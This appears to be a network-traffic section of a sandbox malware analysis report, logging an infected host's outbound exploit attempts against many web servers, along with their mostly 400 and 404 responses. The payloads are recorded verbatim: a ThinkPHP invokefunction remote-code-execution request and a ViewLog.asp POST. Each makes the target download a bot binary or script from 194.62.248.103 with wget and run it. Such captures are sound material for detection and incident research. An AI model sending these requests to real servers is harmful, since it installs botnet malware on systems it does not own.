                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>400 - Bad Request</title> </head> <body> <h1>400 - Bad Request</h1> </body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        823192.168.2.233854695.42.26.20580
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:02.437787056 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:37:02.764555931 CEST502INHTTP/1.1 400 Bad Request
                                                        Date: Sun, 14 Apr 2024 14:37:02 GMT
                                                        Server: Apache/2.4.56 (Debian)
                                                        Content-Length: 308
                                                        Connection: close
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 73 30 39 2e 31 30 30 2e 62 61 72 73 79 2e 62 67 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.56 (Debian) Server at s09.100.barsy.bg Port 80</address></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        824192.168.2.235613295.181.226.6880
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:02.441414118 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:37:02.772542953 CEST307INHTTP/1.1 400 Bad Request
                                                        Server: nginx
                                                        Date: Sun, 14 Apr 2024 14:37:02 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 150
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        825192.168.2.234067695.174.99.3380
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:02.502250910 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:37:02.861926079 CEST1289INHTTP/1.1 200 OK
                                                        Server: Mojolicious (Perl)
                                                        Content-Length: 1436
                                                        Connection: close
                                                        Content-Type: text/html;charset=UTF-8
                                                        Date: Sun, 14 Apr 2024 14:37:02 GMT
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 72 75 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e d0 9d d0 b5 d0 b8 d0 b7 d0 b2 d0 b5 d1 81 d1 82 d0 bd d1 8b d0 b9 20 d0 bb d0 be d0 b3 d0 b8 d0 bd 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 21 2d 2d 2d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 63 73 73 22 3e 0a 20 20 20 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 5f 76 32 2e 63 73 73 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 66 61 76 69 63 6f 6e 2e 70 6e 67 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 63 75 73 74 6f 6d 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 22 3e 0a 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 22 3e 0a 20 20 20 20 20 20 20 20 20 3c 69 6d 67 20 73 72 63 3d 22 2f 6c 6f 67 6f 2e 73 76 67 22 3e 0a 20 20 20 20 20 3c 2f 64 69 76 3e 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 61 74 74 65 6e 74 69 6f 6e 32 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 7a 61 67 6f 6c 6f 76 6f 6b 22 3e 0a 20 20 20 20 20 20 3c 68 31 3e d0 9d d0 b5 d0 b8 d0 b7 d0 b2 d0 b5 d1 81 d1 82 d0 bd d1 8b d0 b9 20 d0 bb d0 be d0 b3 d0 b8 d0 bd 3c 2f 68 31 3e 0a 20 20 20 20 20 20 3c 70 3e d0 9f d0 be d0 b6 d0 b0 d0 bb d1 83 d0 b9 d1 81 d1 82 d0 b0 20 d1 81 d0 b2 d1 8f d0 b6 d0 b8 d1 82 d0 b5 d1 81 d1 8c 20 d1 81 20 d0 bd d0 b0 d0 bc d0 b8 20 d0 bb d1 8e d0 b1 d1 8b d0 bc 20 d1 83 d0 b4 d0 be d0 b1 d0 bd d1 8b d0 bc 20 d1 81 d0 bf d0 be d1 81 d0 be d0 b1 d0 be d0 bc 3c 2f 70 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 20 20 0a 20 20 20 20 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 6f 6f 74 65 72 22 3e 0a 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 6f 6f 74 22 3e 0a 20 20 20 20 20 20 3c 70 3e 38 20 38 30 30 20 32 32 32 20 35 35 20 31 39 3c 2f 70 3e 0a 20 20 20 20 20 20 3c 70 3e 39 31 31 40 74 61 67 61 6e 2e 72 75 3c 2f 70 3e 0a 20 20 20 20 20 20 0a 20 20 3c 2f 64 69 76 3e 0a 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 65 72 76 69 63 65 22 3e 0a 20 20 20 20 20 20 3c 70 3e 49 50 3a 20 38 31 2e 31 38 31 2e 35 34 2e 36 30 3c 2f 70 3e 0a 20 20 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 20 20 0a 3c 2f 64 69 76 3e 0a 0a 0a 20 20 20 20 3c 21 2d 2d 20 42 49 54 52 49 58 32 34 20 2d 2d 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 28 66 75 6e 63 74 69 6f 6e 28 77 2c 64 2c 75 29 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                        Data Ascii: <!DOCTYPE html><html lang="ru"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <title> </title> ...- <link rel="stylesheet" href="bootstrap.min.css"> --> <link rel="stylesheet" href="/style_v2.css"> <link rel="icon" href="/favicon.png"> <script src="/jquery.min.js"></script> <script src="/custom.js"></script> </head> <body> <div class="main"> <div class="logo"> <img src="/logo.svg"> </div><div class="attention2"> <div class="zagolovok"> <h1> </h1> <p> </p> </div></div> <div class="footer"> <div class="foot"> <p>8 800 222 55 19</p> <p>911@tagan.ru</p> </div> <div class="service"> <p>IP: 81.181.54.60</p> </div></div> </div> ... BITRIX24 --> <script> (function(w,d,u){
                                                        Apr 14, 2024 16:37:02.862015009 CEST335INData Raw: 20 20 20 76 61 72 20 73 3d 64 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 73 2e 61 73 79 6e 63 3d 74 72 75 65 3b 73 2e 73 72 63 3d 75 2b 27 3f 27 2b 28 44 61 74 65 2e 6e 6f 77 28 29 2f 36 30 30 30 30 7c 30 29 3b 0a
                                                        Data Ascii: var s=d.createElement('script');s.async=true;s.src=u+'?'+(Date.now()/60000|0); var h=d.getElementsByTagName('script')[0];h.parentNode.insertBefore(s,h); })(window,document,'https://cdn.bitrix24.ru/b11177350/crm/site_


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        826192.168.2.234435694.131.98.1938080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:02.516021967 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:02.844265938 CEST59INHTTP/1.1 400 Bad Request
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        827192.168.2.234842294.121.47.2288080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:02.556051016 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        828192.168.2.234817895.216.25.22480
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:04.197916031 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:37:04.527138948 CEST501INHTTP/1.1 400 Bad Request
                                                        Date: Sun, 14 Apr 2024 14:37:04 GMT
                                                        Server: Apache/2.4.38 (Debian)
                                                        Content-Length: 307
                                                        Connection: close
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 33 38 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 73 72 76 34 31 2e 6a 72 2d 73 79 73 2e 64 65 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.38 (Debian) Server at srv41.jr-sys.de Port 80</address></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        829192.168.2.234366095.85.212.24880
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:04.210306883 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:37:04.531104088 CEST307INHTTP/1.1 400 Bad Request
                                                        Server: nginx
                                                        Date: Sun, 14 Apr 2024 14:37:04 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 150
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        830192.168.2.233828695.58.241.14480
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:04.285396099 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:37:04.693562984 CEST29INHTTP/1.1 200 OK
                                                        Apr 14, 2024 16:37:04.694207907 CEST515INData Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68
                                                        Data Ascii: Connection: closePragma: no-cacheCache-Control: no-cacheContent-Type: text/html; charset=utf-8<!DOCTYPE html PUBLIC "-//W3C//Dtd XHTML 1.0 Strict//EN" "http://www.w3.org/tr/xhtml1/Dtd/xhtml1-Transitional.dtd"><html xmlns="http://www


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        831192.168.2.233714688.209.239.1880
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:04.533457994 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:37:04.855434895 CEST399INHTTP/1.1 400 Bad Request
                                                        Date: Sun, 14 Apr 2024 14:37:04 GMT
                                                        Server:
                                                        Content-Length: 226
                                                        Connection: close
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        832192.168.2.234616862.72.0.1378080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:05.108865023 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:05.275099993 CEST937INHTTP/1.1 404
                                                        Content-Type: text/html;charset=utf-8
                                                        Content-Language: en
                                                        Content-Length: 741
                                                        Date: Sun, 14 Apr 2024 14:37:05 GMT
                                                        Keep-Alive: timeout=20
                                                        Connection: keep-alive
                                                        Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 62 6f 64 79 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 68 31 2c 20 68 32 2c 20 68 33 2c 20 62 20 7b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 68 31 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 68 32 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 68 33 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 70 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 20 61 20 7b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 7d 20 2e 6c 69 6e 65 20 7b 68 65 69 67 68 74 3a 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 68 72 20 63 6c 61 73 73 3d 22 6c 69 6e 65 22 20 2f 3e 3c 70 3e 3c 62 3e 54 79 70 65 3c 2f 62 3e 20 53 74 61 74 75 73 20 52 65 70 6f 72 74 3c 2f 70 3e 3c 70 3e 3c 62 3e 4d 65 73 73 61 67 65 3c 2f 62 3e 20 26 23 34 37 3b 63 67 69 2d 62 69 6e 26 23 34 37 3b 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 70 3e 3c 70 3e 3c 62 3e 44 65 73 63 72 69 70 74 69 6f 6e 3c 2f 62 3e 20 54 68 65 20 6f 72 69 67 69 6e 20 73 65 72 76 65 72 20 64 69 64 20 6e 6f 74 20 66 69 6e 64 20 61 20 63 75 72 72 65 6e 74 20 72 65 70 72 65 73 65 6e 74 61 74 69 6f 6e 20 66 6f 72 20 74 68 65 20 74 61 72 67 65 74 20 72 65 73 6f 75 72 63 65 20 6f 72 20 69 73 20 6e 6f 74 20 77 69 6c 6c 69 6e 67 20 74 6f 20 64 69 73 63 6c 6f 73 65 20 74 68 61 74 20 6f 6e 65 20 65 78 69 73 74 73 2e 3c 2f 70 3e 3c 68 72 20 63 6c 61 73 73 3d 22 6c 69 6e 65 22 20 2f 3e 3c 68 33 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 39 2e 30 2e 33 31 20 28 55 62 75 6e 74 75 29 3c 2f 68 33 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                        Data Ascii: <!doctype html><html lang="en"><head><title>HTTP Status 404 Not Found</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 404 Not Found</h1><hr class="line" /><p><b>Type</b> Status Report</p><p><b>Message</b> &#47;cgi-bin&#47;ViewLog.asp</p><p><b>Description</b> The origin server did not find a current representation for the target resource or is not willing to disclose that one exists.</p><hr class="line" /><h3>Apache Tomcat/9.0.31 (Ubuntu)</h3></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        833192.168.2.2351892112.136.164.1080
                                                        TimestampBytes transferredDirectionData
